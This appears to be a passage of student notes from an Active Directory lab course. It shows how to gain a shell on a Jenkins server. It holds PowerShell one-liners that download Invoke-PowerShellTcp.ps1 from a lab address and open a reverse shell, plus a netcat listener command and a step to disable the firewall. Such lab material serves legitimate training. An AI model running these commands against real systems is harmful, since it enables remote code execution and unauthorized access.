powershell.exe -c iex ((New-Object Net.WebClient).DownloadString('http://172.16.100.X/Invoke-PowerShellTcp.ps1'));Power -Reverse -IPAddress 172.16.100.X -Port 443

or

powershell.exe iex (iwr http://172.16.100.X/Invoke-PowerShellTcp.ps1 -UseBasicParsing);Power -Reverse -IPAddress 172.16.100.X -Port 443

save the configuration

Remember to host the reverse shell on a local web server on your student VM. You can find hfs.exe in the C:\AD\Tools directory of your student VM. Also, make sure to add an exception or turn off the firewall on the student VM.

On the student VM:

C:\AD\Tools\netcat-win32-1.12\nc64.exe -lvp 443

On the Jenkins web console, launch the build by clicking 'Build Now'

then we get the shell in netcat, running as the account the Jenkins service uses.

End of Learning Object 5

End of module 1

Created on 15th November 2023

Edited on 22nd December 2023